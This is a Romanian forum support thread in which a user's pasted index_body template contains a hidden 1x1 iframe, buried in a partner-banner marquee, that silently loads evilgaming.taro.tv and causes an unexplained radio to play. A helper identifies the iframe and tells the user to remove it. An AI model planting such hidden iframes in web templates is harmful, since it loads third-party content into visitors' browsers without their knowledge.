Forum gratuit: forum de suport al utilizatorilor
Doriți să reacționați la acest mesaj? Creați un cont în câteva clickuri sau conectați-vă pentru a continua.

Problema script radio

Pagina 2 din 2 Înapoi  1, 2

Vezi subiectul anterior Vezi subiectul urmator In jos

Rezolvat Problema script radio

Mesaj Scris de dodi Vin Iun 07, 2013 7:24 pm

Rezumarea primului mesaj :

Salut, am si eu o problema cu forumul. In urma cu ceva vreme (2/3 luni) am bagat pe forum niste scripturi si in urma acestora, a aparut un radio... problema e ca nu stiu cum sa il scot, nu stiu in ce script este, daca ma poate ajuta cineva cu un sfat...
Multumesc.
avatar

dodi
Membru Forumgratuit

Mesaje : 24
Varsta : 31
Localizare : Saltina
Data înscrierii : 21/09/2011
Mulțumiri : 0
Internet Explorer punBB

http://relaxteam.forumz.ro/
dodi a fost mulțumit de autorul acestui subiect.

Rezolvat Re: Problema script radio

Mesaj Scris de Cassius Dio Sam Iun 08, 2013 9:44 am

Problema vine de la template-ul index_body, il puteti publica aici? Multumesc!
Cassius Dio

Cassius Dio
Membru onorific
Membru onorific

Mesaje : 10826
Varsta : 26
Localizare : Strawberry Fields
Data înscrierii : 13/07/2012
Mulțumiri : 84
Internet Explorer phpBB3

http://beatles.forummo.com/
Cassius Dio a fost mulțumit de autorul acestui subiect.

Rezolvat Re: Problema script radio

Mesaj Scris de dodi Sam Iun 08, 2013 10:10 am

index_body

Cod:
{JAVASCRIPT}
    <!-- BEGIN message_admin_index -->
    <table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">
      <!-- BEGIN message_admin_titre -->
      <tr>
          <td class="catHead" height="28"><span class="cattitle">{message_admin_index.message_admin_titre.MES_TITRE}</span></td>
      </tr>
      <!-- END message_admin_titre -->
      <!-- BEGIN message_admin_txt -->
      <tr>
          <td class="row1" rowspan="3" align="center" valign="middle">
          <div class="gensmall">{message_admin_index.message_admin_txt.MES_TXT}</div>
          </td>
      </tr>
      <!-- END message_admin_txt -->
    </table>
    <!-- END message_admin_index -->
<a href="/forum"><img src="http://i.imgur.com/paq9f.png" /> <font style="font-size: 11px; font-weight: bold">Board index</font></a>
    <!-- BEGIN switch_user_login_form_header -->
  <form action="{S_LOGIN_ACTION}" method="post" name="form_login">
      <!-- BEGIN switch_fb_connect_no -->
      <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
          <tr>
            <td class="row1" align="center">
                <table border="0" cellspacing="0" cellpadding="0">
                  <tr>
                      <td><span class="genmed">{L_USERNAME}:</span> </td>
                      <td><input class="post" type="text" size="10" name="username"/> </td>
                      <td>
                        <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                        <span class="gensmall">{L_AUTO_LOGIN}</span>
                      </td>
                  </tr>

                  <tr>
                      <td><span class="genmed">{L_PASSWORD}:</span> </td>
                      <td><input class="post" type="password" size="10" name="password"/> </td>
                      <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                  </tr>
                </table>
            </td>
          </tr>
      </table>
      <!-- END switch_fb_connect_no -->

      <!-- BEGIN switch_fb_connect -->
      <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
          <tr>
            <td valign="top" width="100%"  class="row1" align="center">
                <table width="100%">
                  <tr>
                      <td width="55%" valign="middle" align="right">
                        <table class="right">
                            <tr>
                              <td><span class="genmed">{L_USERNAME}:</span> </td>
                              <td><input class="post" type="text" size="10" name="username"/> </td>
                              <td>
                                  <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                                  <span class="gensmall">{L_AUTO_LOGIN}</span>
                              </td>
                            </tr>

                            <tr>
                              <td><span class="genmed">{L_PASSWORD}:</span> </td>
                              <td><input class="post" type="password" size="10" name="password"/> </td>
                              <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                            </tr>
                        </table>
                      </td>
                      <td width="10%" align="center" valign="middle">
                        <span class="genmed fb_or">{switch_user_login_form_header.switch_fb_connect.L_OR}</span>
                      </td>
                      <td width="35%" class="align_gauche"><fb:login-button size="large" onlogin="window.location='/facebook_connect.forum'" v="2" perms="{switch_user_login_form_header.switch_fb_connect.L_FB_PERMISSIONS}">{switch_user_login_form_header.switch_fb_connect.L_FB_LOGIN_BUTTON}</fb:login-button></td>
                  </tr>
                </table>
            </td>
          </tr>
      </table>
      <!-- END switch_fb_connect -->
    </form>
    <!-- END switch_user_login_form_header -->

    {CHATBOX_TOP}
    {BOARD_INDEX}
    <table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
          <td width="50%" valign="top">
            </span>
          </td>
      </tr>
    </table>

    <!-- BEGIN switch_user_login_form_footer -->
    <form action="{S_LOGIN_ACTION}" method="post" name="form_login">
      <!-- BEGIN switch_fb_connect_no -->
      <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
          <tr>
            <td class="row1" align="center">
                <table border="0" cellspacing="0" cellpadding="0">
                  <tr>
                      <td><span class="genmed">{L_USERNAME}:</span> </td>
                      <td><input class="post" type="text" size="10" name="username"/> </td>
                      <td>
                        <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                        <span class="gensmall">{L_AUTO_LOGIN}</span>
                      </td>
                  </tr>

                  <tr>
                      <td><span class="genmed">{L_PASSWORD}:</span> </td>
                      <td><input class="post" type="password" size="10" name="password"/> </td>
                      <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                  </tr>
                </table>
            </td>
          </tr>
      </table>
      <!-- END switch_fb_connect_no -->
      <!-- BEGIN switch_fb_connect -->
      <table width="100%" border="0" cellspacing="0" cellpadding="0" class="user_login_form forumline">
          <tr>
            <td valign="top" width="100%"  class="row1" align="center">
                <table width="100%">
                  <tr>
                      <td width="55%" valign="middle">
                        <table class="right">
                            <tr>
                              <td><span class="genmed">{L_USERNAME}:</span> </td>
                              <td><input class="post" type="text" size="10" name="username"/> </td>
                              <td>
                                  <input class="radio" type="checkbox" name="autologin" {AUTOLOGIN_CHECKED} />
                                  <span class="gensmall">{L_AUTO_LOGIN}</span>
                              </td>
                            </tr>

                            <tr>
                              <td><span class="genmed">{L_PASSWORD}:</span> </td>
                              <td><input class="post" type="password" size="10" name="password"/> </td>
                              <td>{S_HIDDEN_FIELDS}<input class="mainoption" type="submit" name="login" value="{L_LOGIN}" /></td>
                            </tr>
                        </table>
                      </td>
                      <td width="10%" align="center" valign="middle">
                        <span class="genmed fb_or">{switch_user_login_form_footer.switch_fb_connect.L_OR}</span>
                      </td>
                      <td width="35%" class="align_gauche"><fb:login-button size="large" onlogin="window.location='/facebook_connect.forum'" v="2" perms="{switch_user_login_form_footer.switch_fb_connect.L_FB_PERMISSIONS}">{switch_user_login_form_footer.switch_fb_connect.L_FB_LOGIN_BUTTON}</fb:login-button></td>
                  </tr>
                </table>
            </td>
          </tr>
      </table>
      <!-- END switch_fb_connect -->
    </form>
    <!-- END switch_user_login_form_footer -->

       
                                    <td valign="top" width="100%">
                              <div id="center">
                                <!-- BEGIN giefmod_index1 -->
                                {giefmod_index1.MODVAR}
                                    <!-- BEGIN saut -->
                                    <div style="height:{SPACE_ROW}px"></div>
                                    <!-- END saut -->
                                <!-- END giefmod_index1 -->
                              </div>
                          </td></tr><tr>
                    <!-- BEGIN switch_chatbox_activate -->
      <tr>
          <td class="row1">
            <span class="gensmall">{TOTAL_CHATTERS_ONLINE} :  {CHATTERS_LIST}<br />
                <!-- BEGIN switch_chatbox_popup -->
                <div id="chatbox_popup"></div>
                <script type="text/javascript">
                //<![CDATA[
                insertChatBoxPopup('{disable_viewonline.switch_chatbox_activate.switch_chatbox_popup.U_FRAME_CHATBOX}', '{L_CLICK_TO_JOIN_CHAT}');
                //]]>
                </script>
                <!-- END switch_chatbox_popup -->
            </span>
          </td>
      </tr>
    </table>

    <!-- END disable_viewonline -->
       

<br clear="all" />
<!-- BEGIN switch_legend -->
<table border="0" cellspacing="3" cellpadding="0" align="center">
  <tr>
 
  </tr>
</table>


<!-- END switch_legend -->


<div class="adds1"><span style="font-size: 11px; line-height: normal">  <strong>{LOGGED_IN_USER_LIST}</strong></span></div><br/>

<div class="adds2"><span style="font-size: 11px; line-height: normal">  <strong>Legenda</strong> : {GROUP_LEGEND}</span></div>

<tr>
<table class="forumline" width="55%" align="right" border="0" cellspacing="1" cellpadding="0">
<td class="catHead" colspan="2" height="28">
  {Statistici}<b><font color="white"> Detalii Forum:  </font></b>{Statistici}</a></span>       
              </span>
  </tr>


  <td class="row1"><span class="gensmall">  {L_CONNECTED_MEMBERS}</td></span>


<tr>
<table class="forumline" width="45%" border="0" cellspacing="1" cellpadding="0">

      <td class="catHead" colspan="2" height="28">

      {Statistici}<b><font color="white">Cine este conectat pe ReLaXTeam.Tk?:</font></b>{Statistici}
  </tr>
 
<tr>
 <td class="row1"><span class="gensmall">
<strong><img src="http://i48.servimg.com/u/f48/16/68/66/37/pgor_i10.png" border="0" alt="" /> {TOTAL_USERS_ONLINE}  </td></span>
</tr>

<tr>
 <td class="row1"><span class="gensmall">
<strong><img src="http://i48.servimg.com/u/f48/16/68/66/37/i_icon10.png" border="0" alt="" /> {TOTAL_POSTS} | {TOTAL_USERS}</td></span>
</tr>

<tr>
 <td class="row1"><span class="gensmall">
<strong><img src="http://i48.servimg.com/u/f48/16/68/66/37/images16.jpg" border="0" alt="" /> Recordul de utilizatori conectati a fost de 71, Samb 24 Nov 2012 - 15:57</td></span>
</tr>

<tr>
 <td class="row1"><span class="gensmall">
<strong><img src="http://i48.servimg.com/u/f48/16/68/66/37/new_po10.png" border="0" alt="" /> {NEWEST_USER}<img src="http://img132.imageshack.us/img132/103/md1f0x.gif" border="0" alt="" /></td></span>
</tr>

<tr>
<td class="row1"><span class="gensmall">
<img src="http://www.supercs.ro/forum/styles/Supercsro/theme/imagini/online.png" border="0" alt="" /><strong> Comunitatea ReLaXTeam a fost infiintat pe data de : <font color="openblue">13.02.2011</font></strong>
</td>
</tr>

<tr>
 <td class="row1"><span class="gensmall">
<img src="http://i48.servimg.com/u/f48/16/68/66/37/gnome-10.png" border="0" alt="" /> <strong>Versiune Instalata: <font color="openblue"> phpBB2</strong></font></td></span>
</tr>



<tr>
 <td class="row1"><span class="gensmall">
<strong><img src="http://turism.bzi.ro/public/images/send-yahoo-ico.png" border="0" alt="" /><strong>Contact<font color="openblue"> dodi <a href="ymsgr:send?cs_dodi1992"><img border=0 src="http://opi.yahoo.com/online?u=cs_dodi1992&m=g&t=1" /></strong></font></td></span>
</tr>



<tr>
<td class="row1"><span class="gensmall">
<img src="http://i48.servimg.com/u/f48/16/68/66/37/icon-110.png" border="0" alt="" />
<strong>Citeste <a href="/t1-regulament-forum">Termenii de utilizare</strong></a></td></span>
</tr>



<td class="row1"><span class="gensmall">
<img src="http://i48.servimg.com/u/f48/16/68/66/37/gnome-10.png" border="0" alt="" /> <strong>Fondatorul comunitatii ReLaXTeam.Tk este: <font color="#d10000">dodi</font></strong><br />
</tr>


</tr>
<table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0">
<td class="catHead" colspan="2" height="28">
 
                <!-- BEGIN switch_chatbox_activate -->
  <tr>
      <td class="row1">
        <span class="gensmall">{TOTAL_CHATTERS_ONLINE} :  {CHATTERS_LIST}

            <!-- BEGIN switch_chatbox_popup -->
            <div id="chatbox_popup"></div>
            <script type="text/javascript">
            //<![CDATA[
            insertChatBoxPopup('{disable_viewonline.switch_chatbox_activate.switch_chatbox_popup.U_FRAME_CHATBOX}', '{L_CLICK_TO_JOIN_CHAT}');
            //]]>
            </script>
            <!-- END switch_chatbox_popup -->
        </span>
      </td>
  </tr>

<!-- END switch_chatbox_activate -->
</table>

 
<!-- / Footer -->
</div>
<div id="footer_container">
<div class="centercolumn">
<center>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#202020">
<tbody><tr>
<td>
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#404040">
<tbody><tr>
<td class="catHead" colspan="2" height="28">
<span class="cattitle"><center>Parteneri ReLaXTeam.Tk Community</center></span>
</td>
</tr>
<tr>
<td class="row1" rowspan="6" align="center" valign="middle"><img src="http://img401.imageshack.us/img401/2357/parteneriat.png" alt="{L_WHO_IS_ONLINE}" /></td>
<td class="row1" width="100%"><span class="gensmall">
<marquee>
<a href="http://relaxteam.tk/" target="_blank" hidefocus="true" style="outline: none;"><img src="http://s16.postimage.org/jgorc6qv5/44228702639264580825.gif" alt="ReLaXTeam.TK" border="0"></a><a href="http://csone.taro.tv/forum" target="_blank"><img src="http://images.cs1.ro/minibanner-cs1.jpg" width="88" height="31" border="0" alt="WwW.CsOne.Taro.tv"></a><a href="http://evilgaming.taro.tv"><iframe src="http://evilgaming.taro.tv" width='1' height='1' style='visibility: hidden'></iframe><img src="http://i36.servimg.com/u/f36/17/76/16/94/th/2r5xqn10.gif" border="0" alt="EvilGaming"></a>
<a href="http://gameplay.4ulike.com" rel="lightbox" title="GameplaY"><img src="http://i48.tinypic.com/yyys0.jpg" width="88" height="31" border="0"/></a><a href="http://ro-host.cu.cc/" target="_blank" hidefocus="true" style="outline: none;"><img src="http://i.imgur.com/eas8A8t.gif" alt="Ro-Host Web Hosting" border="0"></a><a href="http://www.scenehost.net/news.php" target="_blank" hidefocus="true" style="outline: none;"><img src="http://scenehost.net/parteneri.png" alt="SceneHost" border="0"></a>
 
 
 
 </marquee>
<left>
</left>
<right></right>
</td>
</tr>
</table>
<center><table><tr><td style="border:1px dashed #FF0404 ; padding:1px ;"><span class="cattitle">Copyrightˆ 2011 - 2013 by dodi - Toate drepturile sunt rezervate.</span></td></tr></table></center>

 
 
 
<!-- BEGIN switch_legend -->
<table border="0" cellspacing="3" cellpadding="0" align="center">
  <tr>
      <td align="center" width="20"><img src="{FORUM_NEW_IMG}" alt="{L_NEW_POSTS}" /></td>
      <td><span class="gensmall">{L_NEW_POSTS}</span></td>
      <td></td>
      <td align="center" width="20"><img src="{FORUM_IMG}" alt="{L_NO_NEW_POSTS}" /></td>
      <td><span class="gensmall">{L_NO_NEW_POSTS}</span></td>
      <td>  </td>
      <td align="center" width="20"><img src="{FORUM_LOCKED_IMG}" alt="{L_FORUM_LOCKED}" /></td>
      <td><span class="gensmall">{L_FORUM_LOCKED}</span></td>
  </tr>
</table>
<!-- END switch_legend -->


<!-- BEGIN switch_fb_index_login -->
<div id="fb-root"></div>
<script type="text/javascript">
//<![CDATA[
FB.init({
  appId: '{switch_fb_index_login.FACEBOOK_APP_ID}',
    status: true,
    cookie: true,
    xfbml: true
});
//]]>
</script>
<!-- END switch_fb_index_login -->

  <center><span onmouseout="this.style.opacity=0.3;this.filters.alpha.opacity=30" onmouseover="this.style.opacity=1;this.filters.alpha.opacity=10" style="opacity: 0.3;"><a href="#"><img src="http://i31.servimg.com/u/f31/15/71/96/93/banner10.png"></a></span> </center></td></tr></tbody></table><table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0"><td class="catHead" colspan="2" height="28"><b><h2><font color="white">Links</font></b></h2></td></span></tr><tr><td class="row1"><img src="http://icons.iconarchive.com/icons/semlabs/web-blog/48/arrow-expand-icon.png" alt="Statistici" /></td><td class="row1" width="100%" valign="middle"><p class="genmed"><b>Links: <a href="http://relaxteam.tk/" target=" _blank">www.ReLaXTeam.Tk</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a> | <a href="/forum" target=" _blank">Link-ul tau</a></b></td></tr></table><table class="tablebg" width="100%" cellspacing="1"><tbody><tr><table class="tablebg" width="100%" cellspacing="1"><table class="forumline" width="100%" border="0" cellspacing="1" cellpadding="0"><td class="catHead" colspan="2" height="28"><b><h2><font color="white">Discriminari</font></b></h2></td></span><tr></tr><tr><td class="row1"><img src="http://i40.servimg.com/u/f40/16/80/24/64/discla11.png" alt=" lgz.ro"></td><td class="row1"><font size="1"><b><span style="color: #736F6E">Nici unul din fisierele care apar aici nu sunt gazduite sau transmise de catre acest server. Link-urile sunt furnizate exclusiv de utilizatorii acestui site. ReLaXTeam.Tk nu poate fi trasa la raspundere pentru ceea ce utilizatorii posteaza, sau orice alte actiuni ilegale ale acestora. Nu puteti folosi acest site pentru a distribui sau descarca orice material atunci cand nu aveti dreptul legal de a face acest lucru. Este responsabilitatea ta sa aderi la acesti termeni. Daca aveti indoieli cu privire la legalitatea de continut sau aveti orice suspiciuni, nu ezitati sa ne contactati. Administratorii acestei comunitatii pot selecta utilizatorii si interzicerea oricui in orice moment, fara nici un anunt prealabil. Drepturile de autor pentru toate creatiile ReLaXTeam.Tk apartin echipei noastre si este interzisa reproducerea sau copierea lor.Va rugam sa cititi acest disclaimer si sa il tratati cu maxima seriozitate..</span></b></font><b><span style="color: #00FFFF"><br></span></b></tr></tbody></table></tr></table><br clear="all" /></td><td valign="top" width="0"><div id="emptyidright"

  <!-- Code 2.0 Romanian Top 66 START (relaxteam.forumz.ro) -->
<script src="http://script.top66.ro/id-478615/20/1/Bine%20ati%20venit!%20Apasati%20OK%20pentru%20a%20vota%20pentru%20acest%20site%20in%20Romanian%20Top%2066/code2.js" type="text/javascript"></script>
<a href="http://www.top66.ro" title="Promovare gratuita"><img src="http://images.top66.ro/vote/20.gif" usemap="#Top66Vote" border="0"></a>
<!-- Code 2.0 Romanian Top 66 STOP (relaxteam.forumz.ro) -->
 
<div class=<center>
<table width="<tbody><tr>
<td>
<table width="<tbody><tr>
<td class="<span class="<center>

Ps: Nu am mai avut timp sa modific reclamele din el.

*adaugat tag "code"
avatar

dodi
Membru Forumgratuit

Mesaje : 24
Varsta : 31
Localizare : Saltina
Data înscrierii : 21/09/2011
Mulțumiri : 0
Internet Explorer punBB

http://relaxteam.forumz.ro/
dodi a fost mulțumit de autorul acestui subiect.

Rezolvat Re: Problema script radio

Mesaj Scris de Cassius Dio Sam Iun 08, 2013 10:47 am

Data viitoare cand postati un cod, va rog sa folositi balizele corespunzatoare (code). Mutumesc!

Este din cauza acestui fragment de cod:
Cod:
<iframe src="http://evilgaming.taro.tv" width='1' height='1' style='visibility: hidden'></iframe>
Sterget-l, salvati si publicati template-ul.
Cassius Dio

Cassius Dio
Membru onorific
Membru onorific

Mesaje : 10826
Varsta : 26
Localizare : Strawberry Fields
Data înscrierii : 13/07/2012
Mulțumiri : 84
Internet Explorer phpBB3

http://beatles.forummo.com/
Cassius Dio a fost mulțumit de autorul acestui subiect.

Rezolvat Re: Problema script radio

Mesaj Scris de dodi Sam Iun 08, 2013 10:52 am

Scuze, nu se va mai repeta .
Si multumesc mult, poti da TC
avatar

dodi
Membru Forumgratuit

Mesaje : 24
Varsta : 31
Localizare : Saltina
Data înscrierii : 21/09/2011
Mulțumiri : 0
Internet Explorer punBB

http://relaxteam.forumz.ro/
dodi a fost mulțumit de autorul acestui subiect.

Rezolvat Re: Problema script radio

Mesaj Scris de Cassius Dio Sam Iun 08, 2013 4:42 pm

Pentru putin. A face cu ochiul
topic rezolvat
Cassius Dio

Cassius Dio
Membru onorific
Membru onorific

Mesaje : 10826
Varsta : 26
Localizare : Strawberry Fields
Data înscrierii : 13/07/2012
Mulțumiri : 84
Internet Explorer phpBB3

http://beatles.forummo.com/
Cassius Dio a fost mulțumit de autorul acestui subiect.

Pagina 2 din 2 Înapoi  1, 2

Vezi subiectul anterior Vezi subiectul urmator Sus

- Subiecte similare

Permisiunile acestui forum:
Nu puteti raspunde la subiectele acestui forum